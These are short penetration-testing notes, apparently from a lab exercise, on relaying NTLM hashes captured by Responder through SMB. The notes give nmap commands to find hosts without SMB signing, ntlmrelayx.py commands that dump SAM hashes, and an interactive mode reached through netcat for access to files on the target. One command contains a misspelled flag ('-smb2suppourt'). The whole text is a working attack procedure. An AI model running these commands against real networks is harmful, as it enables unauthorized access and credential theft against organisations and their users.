Instead of cracking Hashes gathered with responder, we can instead relay those hashes via SMB to specific machines and potentially gain access.

Requirements

• SMB sigining must be disabled or not enforced on the target.
• Relayed user credentials must be an admin on machine for any real values.

#Edit the Responder config file turn off SMB and HTTP
sudo nano /etc/responder/Responder.conf

#Identify the hosts without SMB signing
nmap --script=smb2-security-mode.nse -p 445 -Pn 10.10.10.0/24

Save the hosts ip address to a file which are disabled with SMB signing, and start the responder.

#Setup your relay
sudo ntlmrelayx.py -tf targets.txt -smb2support

Trigger an Event.

Once the event occured, it started capturing the SAM hashes.

#Interactive mode
sudo ntlmrelayx.py -tf targets.txt -smb2suppourt -i

Use netcat to gain shell

nc 127.0.0.1 11000

Now i can acces the files and folders in the drive.